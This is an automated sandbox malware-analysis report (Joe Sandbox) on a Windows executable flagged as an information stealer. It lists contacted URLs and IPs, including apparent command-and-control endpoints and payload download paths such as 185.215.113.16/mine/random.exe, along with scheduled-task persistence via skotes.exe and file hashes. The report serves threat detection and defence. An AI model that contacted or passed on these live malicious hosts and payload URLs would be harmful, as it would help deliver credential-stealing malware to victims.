https://duckduckgo.com/chrome_newtab	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpS	skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apih	Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpa	skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/mine/random.exe	Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2316767012.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpncoded	skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/api$F	Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpR	skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.phpa/	skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/hn7:C	Dl6wuWiQdg.exe, 00000000.00000003.2208795248.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235345701.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.16/mine/random.exeN4	Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exeW	Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.mozilla.or	Dl6wuWiQdg.exe, 00000000.00000003.2186181930.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/api	Dl6wuWiQdg.exe, 00000000.00000003.2184395617.0000000000833000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2184484436.000000000083C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/steam/random.exeV	Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/mine/random.exeoSP&K	Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe	Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/apiDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:	Dl6wuWiQdg.exe, 00000000.00000003.2219903539.000000000083D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.rootca1.amazontrust.com0:	Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpI/	skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Dl6wuWiQdg.exe, 00000000.00000003.2186314902.00000000054D5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpE/	skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/	Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microh	Dl6wuWiQdg.exe, 00000000.00000003.2302459604.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199166936.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpded	skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php1/	skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/in	Dl6wuWiQdg.exe, 00000000.00000003.2208795248.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2213997207.0000000000814000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2235345701.0000000000815000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.16/mine/random.exet	Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/ah	Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/	Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.phpn	skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.43/Zu7JuNko/index.php)/	skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.43/Zu7JuNko/index.php%/	skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.21.112.1	fancywaxxers.shop	United States	13335	CLOUDFLARENETUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582703
Start date and time:	2024-12-31 09:47:33 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Dl6wuWiQdg.exe renamed because original name is a hash value
Original Sample Name:	b71b7aedba64dfac7fb62b18fe22e956.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@1/3
EGA Information:	Successful, ratio: 80%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Dl6wuWiQdg.exe, PID 6248 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:48:27	API Interceptor	10x Sleep call for process: Dl6wuWiQdg.exe modified
03:49:01	API Interceptor	1437808x Sleep call for process: skotes.exe modified
09:48:47	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	vVJvxAfBDM.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	LIWYEYWSOj.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	Idau8QuYa3.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	oTZfvSwHTq.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	ZBbOXn0a3R.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
104.21.112.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	Launcher.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	random.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	R3nz_Loader.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	726odELDs8.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	v5Evrl41VR.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
CLOUDFLARENETUS	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.136.42
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	zku4YyCG6L.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	hca5qDUYZH.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
WHOLESALECONNECTIONSNL	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	TdloJt4gY3.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	726odELDs8.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	v5Evrl41VR.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	8WFJ38EJo5.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	PO#5_tower_Dec162024.cmd	Get hash	malicious	DBatLoader	Browse	104.21.112.1
	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.112.1
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.112.1
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	Set-up.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	104.21.112.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	X-mas_2.3.2.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	ReploidReplic.exe	Get hash	malicious	LummaC	Browse	104.21.112.1

Process:	C:\Users\user\Desktop\Dl6wuWiQdg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243520
Entropy (8bit):	6.653095926618001
Encrypted:	false
SSDEEP:	49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
MD5:	375CE25C0529862F6EE716A3E001BB0E
SHA1:	1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
SHA-256:	57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
SHA-512:	0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..........................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3243520
Entropy (8bit):	6.653095926618001
Encrypted:	false
SSDEEP:	49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
MD5:	375CE25C0529862F6EE716A3E001BB0E
SHA1:	1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
SHA-256:	57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
SHA-512:	0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..........................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.4487250633525943
Encrypted:	false
SSDEEP:	6:XmsXUhXUEZ+lX1CGdKUe6tE9+AQy0lbtWEt0:XF4Q1CGAFD9+nVb9t0
MD5:	12B4C233DABE8764D99D6DA23AE55FA3
SHA1:	71E999ED6CE918A80620D5CD0E56B6912FCC1976
SHA-256:	9A245618CC25B1C4FD1EAD54128F32A4C4C2933BA69AA9D3102113BB9CB675EB
SHA-512:	A7D76FC747BC8755FEEB9F571FE24ABF97427FF687E819B684721C8ACCF5EA8F976F31F560F822E8BCE0EC9C849031F051DFD5A2A4B81C7C5A7E32BBBFDFF468
Malicious:	false
Reputation:	low
Preview:	...........D...p..^.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................1.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9480560701728304
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Dl6wuWiQdg.exe
File size:	1'868'288 bytes
MD5:	b71b7aedba64dfac7fb62b18fe22e956
SHA1:	94dbd7b49946dac493466b8702f7ca527833b9cc
